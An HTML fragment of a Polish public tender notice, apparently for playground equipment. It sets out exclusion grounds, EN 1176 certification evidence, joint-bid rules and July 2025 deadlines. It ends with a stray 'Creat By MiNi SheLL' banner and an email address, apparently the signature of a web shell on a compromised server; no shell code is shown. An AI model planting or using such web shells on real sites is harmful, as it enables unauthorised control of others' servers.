Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy z udziału<br/>w postępowaniu: na podstawie § 3 Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy , Zamawiający żąda oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w pkt 3.1. SWZ, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający wymaga złożenia przedmiotowych środków dowodowych.<br/>Część 1 i 2:<br/>Wykonawca do oferty załączy:<br/>a)	karty materiałowe urządzeń przedstawiające rysunki lub zdjęcia oferowanych urządzeń, w których powinny znajdować się dokładne wymiary urządzeń, wymiary stref bezpieczeństwa, kolorystyka urządzeń, rodzaj zastosowanych materiałów, sposób mocowania do podłoża;<br/>b)	certyfikaty potwierdzające zgodność z Polską Normą serii PN EN 1176 – wyposażenie placów zabaw i nawierzchnie, wydane przez akredytowaną jednostkę certyfikującą. Certyfikat musi dotyczyć poszczególnych urządzeń, nie może dotyczyć systemu urządzeń. Dokumenty muszą być aktualne na dzień składania ofert, które będą stanowić załączniki nr 3 do formularza oferty, potwierdzające spełnienie wymagań określonych przez Zamawiającego w opisie przedmiotu zamówienia.<br/>Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych (kart materiałowych urządzeń przedstawiające rysunki lub zdjęcia oferowanych urządzeń, w których powinny znajdować się dokładne wymiary urządzeń, wymiary stref bezpieczeństwa, kolorystyka urządzeń, rodzaj zastosowanych materiałów, sposób mocowania do podłoża oraz certyfikatów potwierdzających zgodność z Polską Normą serii PN EN 1176 – wyposażenie placów zabaw i nawierzchnie, wydane przez akredytowaną jednostkę certyfikującą. Certyfikat musi dotyczyć poszczególnych urządzeń, nie może dotyczyć systemu urządzeń. Dokumenty muszą być aktualne na dzień składania ofert) lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych (kart materiałowych urządzeń przedstawiające rysunki lub zdjęcia oferowanych urządzeń, w których powinny znajdować się dokładne wymiary urządzeń, wymiary stref bezpieczeństwa, kolorystyka urządzeń, rodzaj zastosowanych materiałów, sposób mocowania do podłoża oraz certyfikatów potwierdzających zgodność z Polską Normą serii PN EN 1176 – wyposażenie placów zabaw i nawierzchnie, wydane przez akredytowaną jednostkę certyfikującą. Certyfikat musi dotyczyć poszczególnych urządzeń, nie może dotyczyć systemu urządzeń. Dokumenty muszą być aktualne na dzień składania ofert) lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wezwie do ich złożenia lub uzupełnienia w wyznaczonym terminie. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, art. 109 ust. 1 pkt 4 ustawy Pzp i art. 109 ust. 1 pkt 7 ustawy Pzp, z zachowaniem przepisów art. 109 ust. 3, art. 110, art. 111 ustawy Pzp oraz nie może podlegać wykluczeniu na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie, o którym mowa w pkt. 3.1. SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców są oni zobowiązani na wezwanie Zamawiającego złożyć dokumenty i oświadczenia, o których mowa w pkt 3.5. SWZ, przy czym dokumenty i oświadczenia, o których mowa w pkt 3.5.2 SWZ składa każdy z nich.<br/>W przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia, składają oświadczenie, z którego wynika, które usługi będą wykonywać poszczególni Wykonawcy – załącznik nr 2 do oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały zawarte w § 14 projektu umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy umieścić na platformie zakupowej pod adresem: https://namyslow.ezamawiajacy.pl/app/login w zakładce „OFERTY&#34;.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-10 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-08</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com